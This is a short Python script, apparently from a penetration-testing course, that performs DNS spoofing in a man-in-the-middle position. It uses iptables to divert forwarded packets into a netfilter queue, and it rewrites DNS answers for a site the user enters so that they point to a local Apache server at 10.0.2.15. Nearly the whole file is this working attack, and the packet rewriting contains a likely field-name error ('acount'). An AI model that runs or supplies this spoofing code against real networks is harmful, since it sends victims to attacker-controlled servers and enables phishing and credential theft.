#!/usr/bin/env python
import subprocess
import netfilterqueue
import scapy.all as scapy

# subprocess.call(['sudo', 'systemctl', 'enable', 'systemd-resolved.service'])
# subprocess.call(['sudo', 'systemd-resolve', '--flush-caches'])
def process_packet(packet):
    scapy_packet = scapy.IP(packet.get_payload())
    if scapy_packet.haslayer(scapy.DNSRR):
        qname = scapy_packet[scapy.DNSQR].qname
        if siteURL in str(qname):
            print('[+] Spoofing ' + siteURL)
            answer = scapy.DNSRR(rrname=qname, rdata='10.0.2.15')
            scapy_packet[scapy.DNS].an = answer
            scapy_packet[scapy.DNS].acount = 1
            del scapy_packet[scapy.IP].len
            del scapy_packet[scapy.IP].chksum
            del scapy_packet[scapy.UDP].len
            del scapy_packet[scapy.UDP].chksum
            packet.set_payload(bytes(scapy_packet))
    packet.accept()


try:
    subprocess.call(['service', 'apache2', 'start'])
    queueNum = input("Please enter the queue number ")
    #subprocess.call(['iptables', '-I', 'INPUT', '-j', 'NFQUEUE', '--queue-num', queueNum])
    #subprocess.call(['iptables', '-I', 'OUTPUT', '-j', 'NFQUEUE', '--queue-num', queueNum])
    subprocess.call(['iptables', '-I', 'FORWARD', '-j', 'NFQUEUE', '--queue-num', queueNum])
    siteURL = input("please enter the site url(for example:www.bing.com) ")
    queue = netfilterqueue.NetfilterQueue()
    queue.bind(int(queueNum), process_packet)
    queue.run()
except(KeyboardInterrupt):
    print('[+] Keyboard interrupt detected ... Resetting IP Tables')
    subprocess.call(['iptables', '--flush'])
# iptables -I FORWARD -j NFQUEUE --queue-num 0
# web server on kali command (service apache2 start)
# sudo systemctl enable systemd-resolved.service
# sudo systemd-resolve --flush-caches
